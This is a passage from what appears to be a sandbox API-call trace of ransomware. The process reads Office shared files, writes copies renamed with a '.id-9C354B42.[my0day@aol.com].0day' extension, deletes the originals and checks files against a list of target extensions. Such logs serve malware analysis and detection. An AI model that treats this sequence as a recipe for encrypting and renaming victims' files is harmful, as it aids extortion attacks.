Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.106] GetLastError () returned 0x0 [0040.106] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x75e, lpOverlapped=0x0) returned 1 [0040.498] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x760, lpOverlapped=0x0) returned 1 [0040.499] ReadFile (in: hFile=0x1c4, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.499] WriteFile (in: hFile=0x1b0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.499] SetEndOfFile (hFile=0x1b0) returned 1 [0040.499] CloseHandle (hObject=0x1b0) returned 1 [0040.500] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.500] SetEndOfFile (hFile=0x1c4) returned 1 [0040.501] CloseHandle (hObject=0x1c4) returned 1 [0040.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0040.503] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml")) returned 1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".doc") returned 4 [0040.504] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".docx") returned 5 [0040.504] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.504] lstrlenW (lpString=".pdf") returned 4 [0040.504] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".xls") returned 4 [0040.504] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".xlsx") returned 5 [0040.504] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.504] lstrlenW (lpString=".ppt") returned 4 [0040.504] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".zip") returned 4 [0040.504] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.504] lstrlenW (lpString=".rar") returned 4 [0040.504] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".bz2") returned 4 [0040.504] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".7z") returned 3 [0040.504] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".dbf") returned 4 [0040.504] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".1cd") returned 4 [0040.504] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".jpg") returned 4 [0040.504] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.504] lstrlenW (lpString=".doc") returned 4 [0040.505] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString=".docx") returned 5 [0040.505] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.505] lstrlenW (lpString=".pdf") returned 4 [0040.505] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString=".xls") returned 4 [0040.505] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString=".xlsx") returned 5 [0040.505] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.505] lstrlenW (lpString=".ppt") returned 4 [0040.505] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.505] lstrlenW (lpString=".zip") returned 4 [0040.505] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.505] lstrlenW (lpString=".rar") returned 4 [0040.505] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString=".bz2") returned 4 [0040.505] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString=".7z") returned 3 [0040.505] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.505] lstrlenW (lpString=".dbf") returned 4 [0040.505] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.505] lstrlenW (lpString=".1cd") returned 4 [0040.505] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.505] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML") returned 106 [0040.505] lstrlenW (lpString=".jpg") returned 4 [0040.505] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.505] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.506] lstrlenW (lpString="SETUP.XML") returned 9 [0040.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.835] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1608) returned 1 [0041.835] CloseHandle (hObject=0x170) returned 1 [0041.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20 [0041.835] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.836] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.836] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0041.836] GetLastError () returned 0x0 [0041.836] ReadFile (in: hFile=0x170, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x648, lpOverlapped=0x0) returned 1 [0041.838] WriteFile (in: hFile=0x208, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x650, lpOverlapped=0x0) returned 1 [0041.839] ReadFile (in: hFile=0x170, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.839] WriteFile (in: hFile=0x208, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.839] SetEndOfFile (hFile=0x208) returned 1 [0041.839] CloseHandle (hObject=0x208) returned 1 [0041.840] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.840] SetEndOfFile (hFile=0x170) returned 1 [0041.840] CloseHandle (hObject=0x170) returned 1 [0041.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.841] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0041.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.841] lstrlenW (lpString=".doc") returned 4 [0041.841] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString=".docx") returned 5 [0041.841] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.841] lstrlenW (lpString=".pdf") returned 4 [0041.841] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString=".xls") returned 4 [0041.841] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString=".xlsx") returned 5 [0041.841] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.841] lstrlenW (lpString=".ppt") returned 4 [0041.841] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.841] lstrlenW (lpString=".zip") returned 4 [0041.841] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.841] lstrlenW (lpString=".rar") returned 4 [0041.841] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString=".bz2") returned 4 [0041.841] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.841] lstrlenW (lpString=".7z") returned 3 [0041.841] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.841] lstrlenW (lpString=".dbf") returned 4 [0041.841] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString=".1cd") returned 4 [0041.842] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString=".jpg") returned 4 [0041.842] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString=".doc") returned 4 [0041.842] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString=".docx") returned 5 [0041.842] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.842] lstrlenW (lpString=".pdf") returned 4 [0041.842] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString=".xls") returned 4 [0041.842] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString=".xlsx") returned 5 [0041.842] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.842] lstrlenW (lpString=".ppt") returned 4 [0041.842] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString=".zip") returned 4 [0041.842] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.842] lstrlenW (lpString=".rar") returned 4 [0041.842] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString=".bz2") returned 4 [0041.842] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString=".7z") returned 3 [0041.842] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.842] lstrlenW (lpString=".dbf") returned 4 [0041.842] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.843] lstrlenW (lpString=".1cd") returned 4 [0041.843] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.843] lstrlenW (lpString=".jpg") returned 4 [0041.843] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.843] lstrcmpiW (lpString1=".emf", lpString2=".0day") returned 1 [0041.843] lstrlenW (lpString="Graph.emf") returned 9 [0041.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0042.881] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=116724) returned 1 [0042.881] CloseHandle (hObject=0x174) returned 1 [0042.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20 [0042.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.882] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.882] lstrlenW (lpString=".doc") returned 4 [0042.882] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.882] lstrlenW (lpString=".docx") returned 5 [0042.882] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.882] lstrlenW (lpString=".pdf") returned 4 [0042.882] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.882] lstrlenW (lpString=".xls") returned 4 [0042.882] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.882] lstrlenW (lpString=".xlsx") returned 5 [0042.882] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.882] lstrlenW (lpString=".ppt") returned 4 [0042.882] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.882] lstrlenW (lpString=".zip") returned 4 [0042.882] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.882] lstrlenW (lpString=".rar") returned 4 [0042.882] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.882] lstrlenW (lpString=".bz2") returned 4 [0042.882] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.882] lstrlenW (lpString=".7z") returned 3 [0042.882] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.882] lstrlenW (lpString=".dbf") returned 4 [0042.882] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.882] lstrlenW (lpString=".1cd") returned 4 [0042.883] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString=".jpg") returned 4 [0042.883] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString=".doc") returned 4 [0042.883] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.883] lstrlenW (lpString=".docx") returned 5 [0042.883] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0042.883] lstrlenW (lpString=".pdf") returned 4 [0042.883] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString=".xls") returned 4 [0042.883] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString=".xlsx") returned 5 [0042.883] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0042.883] lstrlenW (lpString=".ppt") returned 4 [0042.883] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString=".zip") returned 4 [0042.883] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString=".rar") returned 4 [0042.883] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.883] lstrlenW (lpString=".bz2") returned 4 [0042.883] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.883] lstrlenW (lpString=".7z") returned 3 [0042.883] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString=".dbf") returned 4 [0042.883] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.883] lstrlenW (lpString=".1cd") returned 4 [0042.884] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0042.884] lstrlenW (lpString=".jpg") returned 4 [0042.884] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.884] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0042.884] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0042.884] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.619] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=19780) returned 1 [0044.619] CloseHandle (hObject=0x1fc) returned 1 [0044.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 0x20 [0044.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.620] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.620] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.620] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.620] GetLastError () returned 0x0 [0044.620] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x4d44, lpOverlapped=0x0) returned 1 [0044.622] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x4d50, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x4d50, lpOverlapped=0x0) returned 1 [0044.623] ReadFile (in: hFile=0x1fc, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.623] WriteFile (in: hFile=0x188, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.623] SetEndOfFile (hFile=0x188) returned 1 [0044.623] CloseHandle (hObject=0x188) returned 1 [0044.623] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.623] SetEndOfFile (hFile=0x1fc) returned 1 [0044.624] CloseHandle (hObject=0x1fc) returned 1 [0044.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.624] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png")) returned 1 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 75 [0044.625] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 